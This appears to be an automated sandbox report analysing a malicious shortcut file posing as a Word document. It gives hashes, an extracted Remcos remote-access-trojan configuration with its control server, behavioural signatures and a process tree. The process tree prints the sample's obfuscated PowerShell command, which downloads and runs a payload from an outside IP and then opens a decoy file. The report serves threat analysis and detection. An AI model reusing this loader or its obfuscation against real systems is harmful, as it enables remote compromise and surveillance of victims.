Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-09-2024 11:25
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
64a52682aa182ab4a0e2cebaeaad3f17
-
SHA1
372c0fdf264c4204b490e11717e51d4ffd97b694
-
SHA256
9549f73133514942aadfcf6f3f38f5d89e573ba7d9b18cde44f29f0a172d7c32
-
SHA512
21dab4c078f34e63677eed29a80f240e0d9687e91a4868f6fa812ede45aec7133242c3c5fa9a324b1ca9040407a4c584ffc820c4617efd712314821a6bc2e5b4
-
SSDEEP
48:88muavUQSIuvZujofxvUZ7HEVxCTI2evUZ7vUqbbudCZZGXu/dZZIa7x:88y81vZiofxHVxCTIRVqeuqQ
Malware Config
Extracted
remcos
stalagg
5.181.156.117:8576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5TL39W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 4996 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2868 scr_previw.exe 2540 scr_previw.exe -
Loads dropped DLL 2 IoCs
pid Process 2868 scr_previw.exe 2540 scr_previw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2540 set thread context of 3904 2540 scr_previw.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2672 WINWORD.EXE 2672 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4996 powershell.exe 4996 powershell.exe 2868 scr_previw.exe 2540 scr_previw.exe 2540 scr_previw.exe 3904 cmd.exe 3904 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2540 scr_previw.exe 3904 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4996 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE 2672 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3836 wrote to memory of 4996 3836 cmd.exe 84 PID 3836 wrote to memory of 4996 3836 cmd.exe 84 PID 4996 wrote to memory of 2868 4996 powershell.exe 92 PID 4996 wrote to memory of 2868 4996 powershell.exe 92 PID 4996 wrote to memory of 2868 4996 powershell.exe 92 PID 4996 wrote to memory of 2672 4996 powershell.exe 94 PID 4996 wrote to memory of 2672 4996 powershell.exe 94 PID 2868 wrote to memory of 2540 2868 scr_previw.exe 95 PID 2868 wrote to memory of 2540 2868 scr_previw.exe 95 PID 2868 wrote to memory of 2540 2868 scr_previw.exe 95 PID 2540 wrote to memory of 3904 2540 scr_previw.exe 96 PID 2540 wrote to memory of 3904 2540 scr_previw.exe 96 PID 2540 wrote to memory of 3904 2540 scr_previw.exe 96 PID 2540 wrote to memory of 3904 2540 scr_previw.exe 96 PID 3904 wrote to memory of 1240 3904 cmd.exe 105 PID 3904 wrote to memory of 1240 3904 cmd.exe 105 PID 3904 wrote to memory of 1240 3904 cmd.exe 105 PID 3904 wrote to memory of 1240 3904 cmd.exe 105 PID 3904 wrote to memory of 1240 3904 cmd.exe 105
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo VkGdaYkxoSDqagAIMUSqWeFFKWBdyoLFWRVEvjodFocYsOlZlDgEkQa; echo VhNVdmCjPvnIlvvpkwnxlfeIqZy; echo UwsGnhMnhQixhmuGlsBMAPSDKSsWQDTvdxNCBxsgEjgUchAAbOiaDRD; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EYBUMEUtkQyUZiebvxwQgurwULNqqzvPMqEGDCvesKCkTRWVCRwLrUXxdJ; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo DaHNXRcvYEIwZocbzUwYQhKQphrgcaAkqoP; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/oshad_88.docx -OutFile oshad_88.docx; echo vKOMValDMwyQRtxOaMEdppITpcmMluNArXmDGCX; s''t''a''rt oshad_88.docx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exeC:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:1240
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5077fb650831b534ec123e068db27a42e
SHA13b85d571d150c5e9e4613ba8f39f20d9660de80a
SHA25685aeb4c3a24567f0c65545a4938ff48fd34e13f6bd0ab717fbb2399b822b4621
SHA512d14257207f6b6c0b2bfe86dcf7cc3ed599dc36b530726c822e5e34fb9006f2e939f9de1b588cd2e776b1b6241b7d3b44e77a75752d5a57b1f96c387f8e783195
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
279B
MD5951a33eecca03d904544bd6529c47b2d
SHA13c2e652752712a6f5fd6e18cd07738ce1685a9f1
SHA2568fa2939a913d781ae4323d52d3ab8e904c1fa4250819ce9946d34a5639b14f14
SHA512d5d2b2f5edf54bb10d10e5825a2b76b1957f3c0c9fa2ab440192a7e624b1a3e595b5373ef9f61d80eb27cbb16f69fb9b417611d977af9c807dc22a71369d65dd
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD5c5a0617f22aab212ae4f951a8af3229a
SHA1cebb755efaeb2ecf118e1c3e61d9fbe08e917ed6
SHA256b034d7ac2c094ab2a6b87aa86eb404eb8f1148990e1a99f8d17b73b68dca3ce1
SHA512dfe23c81b65ae3a9e9c594208f6d0968163d89c7d6917421812f1714419a71888135f637023e7617477553229c97b6546fae5124a3f0861285d07f6e46f68f03
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD518f3b855402e864182316d140aefef3d
SHA12c76020cc07dcca3d68d46933043db457c2a539f
SHA2560d84d7150a876c6766b2ba0fa3ef6b9dcf474a4da3f4c3bd23c32609de9dd9a0
SHA5121ccaeefd8fc5a8a0c3664039096e88c94d1cf12220024039af76286af5058d5e6c91dc7659cd45fa9fc9c4ed16c0e053b9261d7105ccde5e8e6c9023867d1257
-
Filesize
1.9MB
MD546e435aecb557fcb16ae2ea3b22ab7fd
SHA15290156599fd9575c4401c80949ad5672fe64da5
SHA25670e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da
SHA512621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3
-
Filesize
1.0MB
MD5289d2d639e058b63ebe16bd8d543115d
SHA1969736e5f6a2c416f556e2f73358020573486afc
SHA256f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568
SHA5127adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
80KB
MD5cae9827c507632c4a1980479c21a42a2
SHA1d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e
SHA256efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf
SHA512441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768
-
Filesize
15KB
MD535a1aa0fc4972286c1db07e513c3abbc
SHA189f5e48e02a03978cd7931651518472c38a7b272
SHA256be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e
SHA512f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4